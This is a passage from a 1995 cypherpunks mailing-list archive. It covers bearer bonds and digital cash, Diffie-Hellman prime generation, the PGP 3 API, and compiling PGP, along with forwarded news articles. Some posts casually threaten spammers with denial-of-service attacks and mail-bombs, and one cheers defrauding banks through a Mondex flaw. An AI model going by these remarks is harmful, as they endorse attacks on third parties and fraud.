Bell Assistant Professor Law and Technology Program UD Law School bell at odo.law.udayton.edu PGP fingerprint: 78 06 76 AC 32 38 A6 4C B3 81 F4 1E 2E 27 AC 71 From jenkins at fox.nstn.ca Sun Nov 19 09:50:21 1995 From: jenkins at fox.nstn.ca (GORD JENKINS) Date: Mon, 20 Nov 1995 01:50:21 +0800 Subject: JIBC Annoucement Message-ID: <58085.jenkins@fox.nstn.ca> ----- Forwarded message begins here ----- From: junhan zhang Thu, 9 Nov 1995 12:11:10 -0500 (EST) To: gord at array1.arraydev.com Subject: JIBC Annoucement ________________________________________________________________________ Journal of Internet Banking and Commerce The goal of this publication is to inform executives, professionals, entrepreneurs, government employees and other key players on principal developments and trends in the rapidly evolving electronic commerce area all over the World. This free online Journal is a way to keep in touch, to share information, and to establish business contacts (networking) in the area of electronic commerce and banking on the Internet. Journal of Internet Banking and Commerce (JIBC) is primarily devoted to important announcements, original articles, guest columns, significant feature presentations from other publications, as well as survey, reviews, and letters to the editor. Technical discussions that belong to several other specialized lists will be kept to the absolute minimum. Our Journal will be issued no more often than two or three times a week, limiting material to the absolute minimum. We are definitely looking for quality, not quantity. Needless to say, we will be editing filtering and, where possible, summarizing, to provide our busy readers only with substantial information. Join this site and learn the trends in electronic commerce. We promise not to get too" techie". Not too many fights but lots of good discussion. We will need your articles , your letters, your contributions and discussion. 
The Journal is maintained and published courtesy of ARRAY Developments of Ottawa, Canada (http//www.ARRAYdev.com/). The Publisher, Nahum Goldmann may be reached at: Nahum.Goldmann at ARRAYdev.com. Or you can reach the editor and moderator, Gord Jenkins of JENKINS AND ASSOCIATES INC with any questions, comments or insights at: Jenkins at fox.nstn.ca (http//www.infop.com/karoma), Tel. 613-723-1581, FAX 613-723-8938. Please note that the mailing address for subscribe/unsubscribe is JIBC-request at ARRAYdev.com ************ World Wide Web information about this mailing list is available via: http://www.arraydev.com/commerce/JIBC/. Please send any questions on its maintenance to the list owner : . Note that ARRAY Development is neither responsible nor necessarily shares opinions expressed on the list. This message is sent monthly to the JBCI list. If mail sent to you cannot be delivered successfully, your email address will be ruthlessly removed from the mailing list to prevent bounces for senders. If you believe you have been dropped, you can check your subscription status by sending mail to: majordomo at ARRAYdev.com Write in the body of message (NOT Subject:) JIBC Your_email_address This command will confirm whether you are on the current list of subscribers. To subscribe: Send email to JIBC-request at ARRAYdev.com Body of message (NOT Subject:) subscribe To unsubscribe: Send mail to JIBC-request at ARRAYdev.com Body of message (NOT Subject:) unsubscribe To contribute to the mailing list: Send mail to JIBC at ARRAYdev.com Notice the difference between the two email addresses for subscribing (JIBC-request) and posting (JIBC)! Send other inquiries to owner JIBC-admin at ARRAYdev.com To get a description of all valid commands: Send mail to majordomo at ARRAYdev.com Body of message (NOT Subject:) help As our Journal is a moderated list, there is no "digest" facility. 
________________________________________________________________________ ------ Forwarded message ends here ------ -- GORD JENKINS e mail JENKINS at fox.nstn.ca tel 613 794 6735 fax 613 723 8938 From dlv at bwalk.dm.com Sun Nov 19 10:59:32 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Mon, 20 Nov 1995 02:59:32 +0800 Subject: Anonymity and Intellectual Capital In-Reply-To: Message-ID: s1113645 at tesla.cc.uottawa.ca writes: > Barring escrow services, I don't see how contracts (or a lot of > other laws) could be enforced against these entities when they can simply pop > in and out of existence (unless they have some physical counterpart, like > a storefront and merchandise. But then these are easily linkable to True > Names, unlike software companies, financial services or any other part of > the info economy.) > > The value of a reputation is not particularly high in lots of cases or is > occasionally worth throwing over for a big one-time scam. (Pyramid scams > for "reputable" banks) I think this setup would be totally appropriate for the kinds of services or merchandize where the buyer may determine at the time of payment whether the product is what it's billed to be; and needs no warranty or service. In other words, forget any implied warranty of merchantability and go back to Roman Law's "caveat emptor". E.g., if you buy an office chair with a 90-day money back guarantee, you have 90 days to discover defects and return it; you want to be able to get hold of the seller if you have to. On the other hand, if you buy some shares of IBM, once you're satisfied that these really are IBM shares and the other party can sell them, I don't think you need to know anything more about the seller. In fact, in the real stock market most investors go through 2 brokers and usually have no idea who you're buying these shares from. > Ps. I know I could probably look this up, but exactly what are bearer bonds? 
> I frequently hear them mentioned when market anonymity and money laundering > come up. I haven't seen anyone respond, so I'll ramble on. A bond in general is an instrument that you buy from an organization that's trying to raise capital (e.g., a company or a municipality). For example, you might buy for $600 a bond issued by some, who promises to pay you $50 twice a year for the next 20 years, and then pay you another $1000 in 20 years (at maturity). Thus, the organization that issues the bond is borrowing money from the investor and then pays interest on it. There are slight variations, like zero-coupon bonds, which don't make periodic payments, but pay the lump sum at maturity. I heard that in Europe they have perpetual bonds, which never mature. (When you buy bonds, you take certain risks: the issuer may default and not make the promised payments; the interest rates may go up, so you would have gotten better return in a CD; etc; but that's beside the point.) Obviously, there's an aftermarket in bonds. An investor may want a $700 now, rather than $1000 in 20 years, so s/he sells the bond to another investor (generally, the less time is left to maturity, the smaller the discount from the par value). How does the organization that issued the bonds know who is supposed to receive the periodic coupon payments? In the past, many bonds were "bearer instruments". The owner of the bond had in his or her physical possession a piece of paper entitling him to the periodic payments, and transferred the piece of paper to the new owner when the bond was sold. To collect the payments due the owner, someone had to present the piece of paper to the bond issuer's agent. The agent would remove a physical coupon from the piece of paper and give the bearer some money. (Think of a movie ticket -- its bearer is admitted to see a movie and doesn't have to identify himself beyond presenting the ticket.) 
The problem with this system, from the point of view of the Internal Revenue Service and other U.S.Gov't agencies, was that the bearer could be anonymous and did not have to identify his/herself beyond presenting the piece of paper entitling him/her to the payment. Thus, they could in principle not declare these payments on their income tax return and the IRS would have a tough time tracking them down. So, about 20 or so years ago, the U.S.Congress required bond issuers to tell the IRS who received their bond payments. No more anonymity, no more bearer bonds. (My papers are in the office, so this could in fact be more draconian -- U.S. people prohibited from owning bearer bonds issued by European companies.) In comparison, if you own stock in a company, your stock certificate is never a bearer instrument. The corporation knows its shareholders of record, sends them their dividends, and tells the IRS whom it sent the dividends. When you have an interest-bearing account at a bank, a SS# is associated with it (or else you pay penalties) and the IRS is informed about any interest you've earned. The fact that bearer bonds were outlawed suggests that if and when new ways are invented to conduct financial transactions that are conducive to tax evasion (e.g., using anonymous electronic payments), they too may become outlawed. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From rah at shipwright.com Sun Nov 19 12:58:45 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 20 Nov 1995 04:58:45 +0800 Subject: e$: What's a digital bearer bond? Message-ID: >Ps. I know I could probably look this up, but exactly what are bearer bonds? >I frequently hear them mentioned when market anonymity and money laundering >come up. It's the little questions which take the longest to answer... 
I wrote something here in cypherpunks this year called "The Book Entry / Certificate Distinction", which you might want to check out in the archives. Bearer bonds and bearer certificates (like cash) belong to the bearer. To be flip, possession is 100% of the law with a bearer bond. Bearer bonds can be stolen, but they aren't registered anywhere, which makes them useful for anonymity. All along the bottom of a bearer bond are little squares called coupons, which you cut out periodically and mail in to the issuer, and they'll send you back an interest check for that period's interest. Lots of financial phrases come from bearer bonds. When a bond trader talks about a bond's interest rate, she may use the word "coupon" interchangeably, as in, "That bond has a 7% coupon.". Meaning, it pays 7% interest per year. Then there's the phrase "clipping coupons", meaning someone is retired or independently wealthy and living on their bond interest. Every month the interest on one bond or other would come due, the coupons clipped and sent in to the bond's issuer in return for an interest check. Most securities these days are registered to the owner somewhere, at a trustee, at the issuer, at a clearinghouse, or some combination of all. In fact, most securities these days don't exist in physical form at all and exist only on the books at clearinghouses and brokerages. This is why your stock broker squalls about "physical delivery" when you ask for a certificate. About a year ago, we talked about the Depository Trust Company, the clearing house for the New York Stock Exchange. They have entire issues there consisting of a single piece of paper in the clearinghouse vault which are traded entirely on a book entry basis, that is, only accounting entries are swapped when these securities change hands. There are several reasons for this. 
The putative reason is that as taxing authorities, like the Internal Revenue Service, have relied increasingly on various cash-flow taxes like the income tax for their revenue, they have slowly regulated or legislated bearer bonds out of existence in favor of registered, and more to the point, book-entry securities. However, like everything else, law and regulation is really a creature of technology, and the technological reason that book-entry and consequently registered certificates are popular is because they're cheaper to handle locked down in a vault in a clearing house somewhere with the ownership changing hands by changing offsetting accounting entries at the buyer, seller, and clearinghouse. This is a direct consequence of financial systems organized on top of hierarchical communications networks, which was how all communication networks were organized before automated switching, and, more to the point, microprocessor switching made them more and more geodesic in structure. You might want to check the archives for more of my rants here on that subject. The thing about digital certificates, of which ecash is only the camel's nose in the tent, is that while electronic, they're actual bearer certificates. You get a lot of great non sequiturs when you talk about them. "Digital bearer certificates", when you can't actually touch them to "hold" them, Electronic "physical" delivery, and the like. So, with a digital bearer bond, you would have in effect a bundle of digital certificates. One would be for the principal and would be good for the repayment of that principal on the date the bond was called or the redemption date, however the bond offering is written. The other certificates would represent coupons, one for each interest period for the life of the bond. 
These digital certificates, in combination with increasingly geodesic networks enabled by exponentially falling microprocessor prices and strong cryptography, theoretically allow secure, point-to-point trading of any security of any amount with instantaneous clearing and cash settlement. The current hierarchical capital market model, with brokers, "wholesalers", and central exchanges has been collapsing for decades since the advent of electronic trading systems (glorified computer bulletin boards, really) like NASDAQ. With the coming of digital certificate technology on public networks, these markets will be "surfacted" into smaller and smaller concentrations of information and capital. I have no idea what markets will look like when we "return" to things like digital bearer bonds, but there's a prima facie example now on the web as we speak. This week Mark Grant just upgraded his Electronic Cash Market (ecm)-based cyberbuck (c$) webpage "trading post", so that it will take the new Mark Twain ecash. That means that it will be possible to trade old Digicash beta-certificate c$, which sold for 5 cents US per c$, and instantaneously clear and settle them for Mark Twain ecash on-line. No checks have to be sent between trading parties to buy these certificates anymore, which should lower transaction costs significantly, not to mention the float on the money while the trade settled. It was curious that people were buying these things to begin with, as they had no value at all except their uniqueness, anonymous electronic transmissibility, and a promise from Digicash BV to issue only a million of them. Yet now, with the market made infinitely more liquid with the introduction of real-time cash settlement, things will get, as Alice said, "curiouser and curiouser". Digicash still has some large number of these things in the "treasury" unissued. 
I believe these original beta-test certificates have both payee and payor anonymity, especially if traded offline, which has been how they've been traded through the ecm. More fun with numbers. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From eay at mincom.oz.au Sun Nov 19 14:59:47 1995 From: eay at mincom.oz.au (Eric Young) Date: Mon, 20 Nov 1995 06:59:47 +0800 Subject: 4096 bit strong prime for Diffle-Hellman In-Reply-To: Message-ID: On Thu, 16 Nov 1995, Andy Brown wrote: > > Just for anyone interested, I 'found' a suspected 4096 strong prime (p and > > (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2. > As a matter of interest, how long did it take you to generate this, and > with what hardware? I left a 120Mhz Pentium searching for 15 hours > overnight without any success (it managed to eliminate 10 candidate primes > as not strong in that time). Well, I left it running for about 50 hours over last weekend without a hit. Then I restarted it on Monday night and got a hit in about 12 hours :-). (I thought it has finished sooner but I looked again at the 'script(1)' output and it did take 12 hours). It is sort of hard to tell how long things would take, due to the hit or miss nature of this kind of search for primes. This is on a SGI with a 200mhz R4400 which is about the same speed as a 120mhz pentium when using my maths libraries. I'm doing the 'pick' an odd random number 'p', sieve p and (p-1)/2 over the first 2000 primes, adding in steps until a number passes the sieve. For a generator of 2, p mod 24 == 11 should be true. When it passes, then do Miller-Rabin tests on P and (P-1/2) enough times to be happy that the number is probably a prime :-). 
I believe that there are improvements that I can put in there for the initial search for candidate primes The actual numbers for the search are as follows, 1057 numbers passed the 'strong prime sieve'. 7 numbers passed the prime test 1 number passed both the prime and strong prime test. I suspect the ratio of 132 candidates for 'strong' prime testing for each 'prime' could be brought down quite a bit but since I only need strong primes for DH parameters, I probably will not spend the time on improving my initial sieve right now. eric PS, I just 'found' another 2048 bit strong prime last friday night, 2929 numbers passed the 'strong prime sieve'. 29 numbers passed the prime test (101 candidates per hit) 1 number passed both the prime and strong prime test, 4h12m run time. -- Eric Young | Signature removed since it was generating AARNet: eay at mincom.oz.au | more followups than the message contents :-) From warlord at MIT.EDU Sun Nov 19 15:59:06 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 20 Nov 1995 07:59:06 +0800 Subject: ecash as pgp In-Reply-To: <199511191118.DAA14424@infinity.c2.org> Message-ID: <199511192339.PAA07631@tess-turbo.mit.edu> > Secondly, from what I can tell, it's like PGP. To integrate it > into other software you have to do all sorts of nasty output > parsing. why the hell can't it just produce nice, terse, informative, > UNIX-like output? This will change with PGP 3. There is a very nice, easy API for PGP 3 which I have been working on for over the last month. In fact, the main processing code is done. After Thanksgiving I will be working on an API document which explains the design and implementation of the API. IMHO, the API is REALLY EASY to use -- I have a PGP encryption program which has all of the main functionality of PGP w.r.t. creating messages, and the program is only 250 lines of commented C code. The current work is far from complete, but it is getting close! 
It should make integrating PGP into other programs very simple -- just link against libpgp.a. :) Enjoy! -derek From sameer at c2.org Sun Nov 19 16:07:54 1995 From: sameer at c2.org (sameer) Date: Mon, 20 Nov 1995 08:07:54 +0800 Subject: ecash as pgp In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu> Message-ID: <199511192338.PAA13806@infinity.c2.org> Cool! I'm really glad you're working in this. Now if only digicash would release libecash.a, we'd have the infrastructure for some killer apps. > > > Secondly, from what I can tell, it's like PGP. To integrate it > > into other software you have to do all sorts of nasty output > > parsing. why the hell can't it just produce nice, terse, informative, > > UNIX-like output? > > This will change with PGP 3. There is a very nice, easy API for PGP 3 > which I have been working on for over the last month. In fact, the > main processing code is done. After Thanksgiving I will be working on > an API document which explains the design and implementation of the > API. > > IMHO, the API is REALLY EASY to use -- I have a PGP encryption program > which has all of the main functionality of PGP w.r.t. creating messages, > and the program is only 250 lines of commented C code. > > The current work is far from complete, but it is getting close! It > should make integrating PGP into other programs very simple -- just > link against libpgp.a. :) > > Enjoy! > > -derek > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From warlord at MIT.EDU Sun Nov 19 16:09:09 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 20 Nov 1995 08:09:09 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: <199511190419.UAA15156@infinity.c2.org> Message-ID: <199511192347.PAA07661@tess-turbo.mit.edu> > MIME Object Security Services.
It's a technically superior alternative > to PGP, but one with an uncertain future. It's not being actively > developed by anyone other than TIS, and their TISMOSS prototype > implementation is far from being generally usable. What do you mean by "technically superior"? What technical merits does MOSS have over PGP? It does have a better protocol with which to integrate it into mailers, but it is only a transmission protocol, not a security mechanism change. Worse, MOSS uses X.509, which requires a lot of overhead for certificates. On the other hand, the MIME-PGP protocol can provide the same integration functionality as MOSS and still allow the use of the simple PGP certification structure that already exists. -derek From rjc at clark.net Sun Nov 19 16:11:17 1995 From: rjc at clark.net (Ray Cromwell) Date: Mon, 20 Nov 1995 08:11:17 +0800 Subject: "Junk E-Mail" Message-ID: <199511192347.SAA06834@clark.net> Is anyone else getting lots of junk e-mail lately? I'm getting all kinds of direct marketing crap to both of my main accounts and I haven't posted to usenet in months. I pretty much only post to cypherpunks, and that is rarely. And I never put my real email address on web sites that ask for them. I fear I am on some kind of direct marketing e-mail "list". I've warned the perpetrators that if I get another ad from them, they better expect a denial-of-service attack from me on their site and lots of mail-bombs. sick of the clutter, -Ray From wilcoxb at taussky.cs.colorado.edu Sun Nov 19 16:35:40 1995 From: wilcoxb at taussky.cs.colorado.edu (Bryce) Date: Mon, 20 Nov 1995 08:35:40 +0800 Subject: ecash as pgp In-Reply-To: <199511192339.PAA07631@tess-turbo.mit.edu> Message-ID: <199511200021.RAA09388@taussky.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- > This will change with PGP 3. There is a very nice, easy API for PGP 3 > which I have been working on for over the last month. In fact, the > main processing code is done. 
After Thanksgiving I will be working on > an API document which explains the design and implementation of the > API. > > IMHO, the API is REALLY EASY to use -- I have a PGP encryption program > which has all of the main functionality of PGP w.r.t. creating messages, > and the program is only 250 lines of commented C code. > > The current work is far from complete, but it is getting close! It > should make integrating PGP into other programs very simple -- just > link against libpgp.a. :) This is SUCH good news! May your coding be swift and sure. Let no bug delay that wonderful day of public distribution. Regards, Bryce From turner at TeleCheck.com Sun Nov 19 19:10:01 1995 From: turner at TeleCheck.com (Joe Turner) Date: Mon, 20 Nov 1995 11:10:01 +0800 Subject: Recompiling PGP262i under microsoft. Message-ID: <9511200255.AA03117@mercury.telecheck.com> For those that might benefit, I have included some notes I have gained through my wanderings through PGPland, towards an easy PGP-mail program for Windows. Below I have included sketchy details in compiling PGP as an MS-DOS app, WIN16 DLL, and Win32 DLL. I won't be able to provide specific details, until I recover data from my backup tapes (I had a nasty drive failure, and have been lethargic in recovering). I finally get my IBM PC/RT configured for TCP/IP and my PC explodes. :<. If anything here is wrong, or fuzzy, feel free to post corrections, etc., as this is all from my alcohol soaked, nicotine riddled brain.
Compiling PGP under MSVC 1.5 & 2.x
========= === ===== ==== === = ===

To compile PGP under MSVC 1.5 (I believe there is a supplied Microsoft C make file that was written for Quick C) you will need to create a project and add the files necessary. Be sure to include the already compiled RSAREF.LIB in the project files. Unfortunately, there is one very annoying problem with Microsoft Visual C, in which it will regenerate the dependencies from the source code files without preprocessing the #ifdefs. You will have to edit the make file and take out all of the UNIX sys/whatever stuff. I believe this is the biggest hurdle, but you might try using the Quick C make file, although I don't think it will work without modification (Microsoft seems disenchanted with compatibility, even between revisions of their own software). You may also have some trouble with type conversion, but I think it's intuitive to overcome that. (it's been a while...). If anyone knows of an easier way to do this, I will be more than happy to listen.

Compiling RSAREF as a DLL under MSVC
========= ====== == = === ===== ====

This is easy, but you may have trouble with the dependencies again. The most important thing is to create a .DEF file and put all of the export declarations in there. Unless you plan on rewriting PGP to load the DLL dynamically, simply link against it to save a few headaches (remember you still need a .DEF file or you will get unresolved errors!).

Compiling PGP as a Windows DLL
========= === == = ======= ===

I was able to find someone in Australia (sorry, the name eludes me at the moment) who managed to port PGP to a Windows DLL, under Borland C. I only installed Borland C++ 4.0 today, so much of my work/play has been targeted towards Microsoft Visual C++ 1.5/2.0 under NT (besides I was waiting on PGP3.0). If anyone wants these files (for Borland) I will send them out when I recover them (hopefully).
It includes modifications to no more than three files, and includes both reentrant and non-reentrant entry points. I also have the mail program (MAPI) that this guy wrote in executable form. He was very careful about the Australian equivalent of the ITAR, so he would only send the modified files, which I will pass on for those who are interested. If you want to do the same thing under MSVC, the same changes apply. Hope that helps some. -- Joe N. Turner Telecheck International turner at telecheck.com 5251 Westheimer, PO BOX 4659, Houston, TX 77210-4659 From nobody at REPLAY.COM Sun Nov 19 20:56:15 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 20 Nov 1995 12:56:15 +0800 Subject: Ponzi Web Message-ID: <199511200430.FAA02552@utopia.hacktic.nl> NY Times, 11-20-95, front page. If Medium Is the Message, the Message Is the Web By John Markoff San Francisco, Nov. 19 -- The Associated Press was formed in the mid-19th century when a group of newspapers decided to invest jointly in a newfangled medium -- the telegraph -- to speed the collection and dissemination of information. Last week, A.P. announced that it would adopt a newer-fangled medium -- the World Wide Web -- to begin distributing its articles and photographs over the global Internet. It was simply the latest, but perhaps most historically significant, move yet by an old-line media organization into the World Wide Web, the Internet multimedia information-retrieval system that appears on the verge of becoming a mass medium itself. If the medium is the message, then the message these days is the World Wide Web.
In short order the Web, which three years ago was little more than a research tool for physicists and computer hobbyists, has flourished. It is being embraced by media concerns, consumer-product companies and businesses of various stripes that are creating thousands of so-called Web sites each month, with the number of computers playing host to one or more of these sites already exceeding 100,000. Conservative estimates place the number of people who have used the Web in the millions, and it is not hard to find more breathless estimates in the tens of millions. Capable of letting people use computers to send and receive text, sound, still images and video clips, the Web incorporates elements of the various print and electronic media that have preceded it. And yet, the Web is poised not to replace its predecessors but to take a place alongside them as a social, cultural and economic force in its own right. Its complementary role is already evident: many radio stations and all the major television networks have Web sites promoting their programs and stars. Newspapers, including The New York Times, are devising cyberspace editions. And few movies anymore are released without a promotional Web site, including "Goldeneye" the James Bond film that opened this weekend at theaters everywhere and on the Web at the address http://www.mgmua.com/bond. The site offers the movie's theme song performed by Tina Turner, more than a dozen video clips from the film and illustrated biographies of the cast members. Prime-time television commercials by Toyota and other advertisers now routinely include a Web address. And Procter & Gamble, whose advertising has long helped underwrite the mass media, has even staked out prime Web real estate by reserving addresses that include flu.com and toiletpaper.com. "We are poised on the edge of a new medium," Clay Felker, director of the magazine program at the University of California at Berkeley's graduate journalism school, said. 
"It's going to change the nature of how we acquire information." As with each mass medium that has arrived before it, the Web has reached this threshold through a confluence of a key technology, a ready audience and a stream of corporate backers willing to bet that profitable businesses can be built on it. But few experts are willing to declare that the Web has taken its place in the mass media pantheon because the profitable business formulas have yet to be found. Newspapers and magazines make money by selling individual copies, subscriptions and advertising space. Radio and television stations sell air time to those with money and a message. Movie theaters sell tickets. But on the Web so far, despite seed-money by adventurous advertisers and some tentative efforts to charge for access to sites or services, there is no certainty that this medium will achieve the critical mass that capitalism demands of its mass media. "How do you make a business out of the World Wide Web?" asked Norman Pearlstine, editor in chief of Time Inc., which has an experimental Web site called Pathfinder that offers selected contents from the company's magazines (http://www.pathfinder.com). But because ad revenue alone is not carrying the freight, Time Inc. will begin testing ways to charge visitors to its site. And yet, the technological prerequisites are firmly in place. The Web is an outgrowth of the Internet, which began as an academic research experiment in the late 1960's. For more than two decades the Internet remained largely inaccessible, used mainly by computer scientists and Pentagon researchers, university scholars and students. Then came the World Wide Web. Like the Internet, the Web began as a tool to let scientists easily and quickly share information. Conceived in the late 1980's by Tim Berners-Lee, who was then a software designer at CERN, the Swiss physics research center, the basic Web technology was first put to use in 1990. 
The big breakthrough came in 1992, when student researchers at the National Center for Supercomputing Applications in Illinois created Mosaic, a simple software tool called a Web browser. Mosaic permitted access to information anywhere on the World Wide Web by letting the user point and click a computer mouse on highlighted words or images on the screen. The browser, which became available in commercial versions like Netscape Communications' Navigator, not only made Web sites easily accessible, it prompted businesses, organizations and even individuals to create new Web sites by the thousands. Thus did the Web quickly become a standard and accepted way for the growing millions of the computer-literate to communicate and to entertain and inform themselves. And unlike each previous mass medium, the Web does not require its audience to be merely passive recipients of information. For very little money, and with a modicum of computer skills, virtually anyone can create his or her own Web site. Anyone with a modem is potentially a global pamphleteer. One consequence of this democratization is that the Web can be a remarkably anarchic forum compared with the old-style mass media. "Think of this as television colliding with the telephone party line," said Paul Saffo, a computer industry consultant at the Institute for the Future, a Menlo Park, Calif., research firm. "In terms of social consequences, the Web is a great experiment. It's going to deliver us community with a vengeance -- and we may find we don't want it." ----- NYT, 11-20-95, Business Section. Losses From Computer Breaches Are on the Rise, a Study Finds By Peter H. Lewis Financial losses from computer break-ins and other security breaches are on the rise, according to a survey of corporate computer-security managers, with nearly half of all companies reporting losses as a result of hackers, viruses, sabotage, corporate spies and incompetent employees.
At least 20 of the 1,290 companies responding to the annual security survey from Information Week magazine and the consulting firm Ernst & Young, reported losses of more than $1 million last year. But the poll also found that companies were more aware of the risks arising from growing reliance on computer networks, and were taking stronger steps to protect their information systems. "There is definitely increased awareness on the part of senior management," said Daniel White, national director of information security at Ernst & Young's Chicago office. But Mr. White said that despite increased vigilance by computer security officers, the lack of security tools made it risky to conduct electronic-document interchange and other sensitive business operations on the Internet. "Lots of organizations are using the Internet in a thoughtful way for marketing and information dissemination," Mr. White said. "But do I really want to use it" for an electronic-document transaction? "Not yet." Details of the survey, the third annual one, are in the Nov. 28 issue of Information Week, available this week. Among other findings were that nearly 80 percent of companies surveyed had at least one full-time information-security officer, a slight increase from last year. Of those, 45 percent report directly to the corporation's chief information officer, reflecting the growing recognition of the importance of computer security, Mr. White said. Nearly 70 percent of those responding said their companies had sustained a serious virus attack in the last year, a sharp rise from 54 percent two years ago. ----- From ericande at cnw.com Sun Nov 19 21:24:08 1995 From: ericande at cnw.com (Eric Anderson) Date: Mon, 20 Nov 1995 13:24:08 +0800 Subject: Visual Basic 4.0 encryption prog. 
Message-ID: <01BAB6A0.6A583C20@king1-12.cnw.com> I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid. My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the-shelf" code. So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler. I don't really care about ITAR or any of that other BS, I just won't put MY name on it. From ericande at cnw.com Sun Nov 19 21:36:29 1995 From: ericande at cnw.com (Eric Anderson) Date: Mon, 20 Nov 1995 13:36:29 +0800 Subject: Message-ID: <01BAB6A0.530885C0@king1-12.cnw.com> ---------- From: anonymous-remailer at shell.portal.com[SMTP:anonymous-remailer at shell.portal.com] Sent: Friday, November 17, 1995 7:31 PM To: cypherpunks at toad.com Subject: Shoe-horning Mondex onto the Internet -- still won't fit >+ According to inside sources, is grossly vulnerable to replay attacks >(offline multi-spending to different parties) >-- Mondex has security holes >-- Customers who defraud Mondex-using banks have legal deniability in a >court of law: they can simply request banks to produce the security >protocols as evidence; if they refuse the case is thrown out of >court (precedent: UK and US phantom-ATM withdrawal cases) HEY-sounds GREAT to me, I'm ALL FOR IT!!! From Greg_Rose at sibelius.sydney.sterling.com Sun Nov 19 22:46:07 1995 From: Greg_Rose at sibelius.sydney.sterling.com (Greg ROSE) Date: Mon, 20 Nov 1995 14:46:07 +0800 Subject: Cypherpunks in Sydney (Australia) Meeting Message-ID: <9511200554.AA49910@paganini.sydney.sterling.com> -----BEGIN PGP SIGNED MESSAGE----- I mentioned some time ago that if there was sufficient interest I'd organise a Sydney Cypherpunks get-together.
It was supposed to be in mid-November :-(, but you can't have everything. In the absence of consultation with anyone, I've booked a small suburban Chinese restaurant for the venue. This seems in keeping with other cypherpunks meetings (not that I've ever been to one...) Date: Wednesday December 6th. Time: 7:00pm Place: Mee Ton Restaurant 139 Concord Road Concord The restaurant is easy to get to, only 20 minutes by car from the city and easy to park. If driving out from the city along Parramatta Road, you just have to be careful not to turn onto the freeway. Concord Road is *second* and crosses back over the freeway. The restaurant is about 400 metres north of Parramatta Road, on the eastern side. It's also only a short walk from North Strathfield station. If enough people are using public transport I can organise a pickup from (the main) Strathfield station (a little more convenient in terms of frequency of trains). I'm anticipating maybe ten-fifteen people. They have a nice, light banquet menu for $12 per head, everything included except alcohol. RSVP, please, by Friday the 1st, and tell me whether you are interested in a PGP key signing at the same time. I will post this to aus.org.auug, sage-au-nsw, sci.crypt. Any other suggestions appreciated, and don't hesitate to pass around the details. - -- Greg Rose INTERNET: greg_rose at sydney.sterling.com Sterling Software VOICE: +61-2-9975 4777 FAX: +61-2-9975 2921 28 Rodborough Rd. http://www.sydney.sterling.com:8080/~ggr French's Forest 35 0A 79 7D 5E 21 8D 47 E3 53 75 66 AC FB D9 45 NSW 2086 Australia. co-mod sci.crypt.research, USENIX Director.
From frantz at netcom.com Sun Nov 19 23:59:11 1995 From: frantz at netcom.com (Bill Frantz) Date: Mon, 20 Nov 1995 15:59:11 +0800 Subject: remailer abuse Message-ID: <199511200747.XAA09583@netcom19.netcom.com> At 22:43 11/19/95 -0800, Timothy C. May wrote: >Yes, anonymous communication is getting easier, and the costs of trying to >stop it are becoming impossibly high. It would essentially require a police >state to stop, and even then it probably couldn't be stopped... Considering that there are well known ways of spoofing IP addresses, if you really want to, you can be anyone. (They must be well known. I know at least one. ) >2. Sender pays the costs of transmission. That is, if someone wishes to >send 10 megabytes to a site, at least _he_ (or _she_) pays the freight. >This is of course the way things now work with the U.S. postal system, with >"Postage Due" no longer common... I think we lack direct charges for network traffic because detailed accounting for use of each net-link is too expensive. The situation is similar to that of the telephone system in the 1950s, where the switches which connected local calls did not have enough smarts to do charging, and so started the tradition of "free" local calls. When lots of people start sending full motion video over the net we may see ISPs develop use based charging schemes. I should add that one of the reasons I use Netcom is that they do NOT charge for connect time or network traffic. There is a market for known, fixed costs too. Bill ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave.
frantz at netcom.com Los Gatos, CA 95032, USA From dannyc at gmap.leeds.ac.uk Mon Nov 20 03:31:57 1995 From: dannyc at gmap.leeds.ac.uk (Danny Cox) Date: Mon, 20 Nov 1995 19:31:57 +0800 Subject: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY Message-ID: <10778.9511201052@gmap.leeds.ac.uk> Piete, I read various bits about using the MBone for conferences etc including this one, and I'd like to be able to listen to them. Can you point me to any tools which I can use to access it and give me some pointers as to how to use them? Thanks, Danny Cox From jamesd at echeque.com Mon Nov 20 04:53:43 1995 From: jamesd at echeque.com (James A. Donald) Date: Mon, 20 Nov 1995 20:53:43 +0800 Subject: "Junk E-Mail" Message-ID: <199511200542.VAA04645@blob.best.net> At 06:47 PM 11/19/95 -0500, Ray Cromwell wrote: > > Is anyone else getting lots of junk e-mail lately? Yes. When people spam usenet, they get hit by a large highly organized counter attack. When they spam people by email, no large counter attack -- we need a place where people go to share knowledge of email abuse. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From llurch at networking.stanford.edu Mon Nov 20 04:54:17 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Mon, 20 Nov 1995 20:54:17 +0800 Subject: "Junk E-Mail" In-Reply-To: <199511192347.SAA06834@clark.net> Message-ID: On 